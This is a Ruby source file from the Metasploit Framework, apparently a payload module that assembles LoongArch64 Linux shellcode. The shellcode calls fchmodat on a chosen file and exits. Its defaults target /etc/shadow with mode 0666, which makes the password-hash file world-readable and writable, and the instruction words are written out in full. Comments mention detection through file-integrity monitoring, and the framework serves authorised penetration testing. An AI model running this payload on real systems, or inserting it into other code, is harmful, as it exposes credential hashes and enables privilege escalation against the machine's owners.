rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/loongarch64/chmod.rb
# frozen_string_literal: true
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Single-stage Linux payload for LoongArch64 that issues one fchmodat(2) call on a
# configured path with a configured mode and then exits with status 0.
#
# Seen from the defending side, the whole runtime footprint is a single
# fchmodat(AT_FDCWD, FILE, MODE, 0) followed by exit(0). File-integrity monitoring or
# audit rules covering permission changes on sensitive files (the default FILE is
# /etc/shadow) are therefore the natural place to detect it.
module MetasploitModule
  # Size with the default options: nine 4-byte instruction words (36 bytes) plus the
  # NUL-terminated default path "/etc/shadow" (12 bytes).
  CachedSize = 48

  include Msf::Payload::Single
  include Msf::Payload::Linux

  # Registers the module metadata and the two user-facing options.
  #
  # @param info [Hash] metadata supplied by the framework, merged with this module's own
  def initialize(info = {})
    module_details = {
      'Name' => 'Linux Chmod',
      'Description' => 'Runs chmod on the specified file with specified mode.',
      'Author' => 'bcoles',
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => ARCH_LOONGARCH64,
      'References' => [
        ['URL', 'https://man7.org/linux/man-pages/man2/fchmodat.2.html'],
        ['URL', 'https://github.com/bcoles/shellcode/blob/main/loongarch64/chmod/chmod.s'],
      ]
    }
    super(merge_info(info, module_details))

    # MODE is restricted to octal digits by the option's regex; the 12-bit range check
    # happens later, in #generate.
    option_list = [
      OptString.new('FILE', [ true, 'Filename to chmod', '/etc/shadow' ]),
      OptString.new('MODE', [ true, 'File mode (octal)', '0666' ], regex: /\A[0-7]+\z/),
    ]
    register_options(option_list)
  end

  # @return [String] the path taken from the FILE option, or an empty string when it is unset
  def chmod_file_path
    configured_path = datastore['FILE']
    configured_path || ''
  end

  # @return [Integer] the MODE option parsed as octal; '0666' is used when the option is unset
  def mode
    configured_mode = datastore['MODE'] || '0666'
    configured_mode.oct
  end

  # Encodes `ori $a2, $zero, <mode>`.
  #
  # Only the low 12 bits of +mode+ are kept and placed at bit 10 of the instruction word.
  # Example: 0o666 (0x1b6) encodes to 0x0386d806.
  #
  # @param mode [Integer] the file mode to load into $a2
  # @return [Integer] the 32-bit instruction word
  def chmod_instruction(mode)
    immediate = mode & 0xfff
    0x03800006 | (immediate << 10)
  end

  # Assembles the payload: nine instruction words, then the NUL-terminated path, then
  # zero padding up to a 4-byte boundary.
  #
  # @param _opts [Hash] unused here; forwarded implicitly by the bare +super+ call
  # @return [String] the parent payload's output followed by the assembled bytes
  # @raise [ArgumentError] when the mode does not fit the 12-bit immediate of +ori+
  def generate(_opts = {})
    if mode > 0xFFF
      raise ArgumentError, "chmod mode (#{mode}) is greater than maximum mode size (0xFFF)"
    end

    # The pcaddi immediate (8 words = 32 bytes, relative to the pcaddi at offset 4)
    # resolves to offset 36, i.e. the first byte after these nine words, where the path
    # string is appended below. Changing the instruction count means changing it too.
    instruction_words = [
      0x02fe7004, # addi.d $a0, $zero, -100 # AT_FDCWD
      0x18000105, # pcaddi $a1, 8 # pointer to path
      chmod_instruction(mode), # ori $a2, $zero, <mode>
      0x03800007, # ori $a3, $zero, 0 # flags
      0x0380d40b, # ori $a7, $zero, 53 # __NR_fchmodat
      0x002b0101, # syscall 0x101
      0x03800004, # ori $a0, $zero, 0 # exit code
      0x0381740b, # ori $a7, $zero, 93 # __NR_exit
      0x002b0101, # syscall 0x101
    ]

    # 'V*' packs every word as a 32-bit little-endian value.
    assembled = instruction_words.pack('V*')
    assembled += chmod_file_path + "\x00".b

    # Pad with NUL bytes until the total length is a multiple of 4.
    assembled += "\x00".b until (assembled.bytesize % 4).zero?

    super.to_s + assembled
  end
end